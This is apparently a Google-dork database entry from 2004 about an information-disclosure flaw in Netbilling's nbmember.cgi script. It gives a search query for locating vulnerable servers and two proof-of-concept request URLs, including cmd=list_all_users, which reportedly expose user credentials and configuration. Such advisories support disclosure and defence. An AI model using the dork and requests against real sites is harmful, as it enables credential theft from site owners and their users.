filetype:cgi inurl:nbmember.cgi

• SHDB
• 1576 阅读

• 日期：2004-10-26
• 类别：
  • Advisories and Vulnerabilities
• 作者：anonymous
• 语法：filetype:cgi inurl:nbmember.cgi

• vulnerable Netbilling nbmember.cgiNetbilling 'nbmember.cgi' script is reported prone to an information disclosure vulnerability. This issue may allow remote attackers to gain access to user authentication credentials and potentially sensitive configuration information.The following proof of concept is available:http://www.example.com/cgi-bin/nbmember.cgi?cmd=testhttp://www.example.com/cgi-bin/nbmember.cgi?cmd=list_all_users&keyword=hereistheaccesskeywordhttp://www.securityfocus.com/bid/11504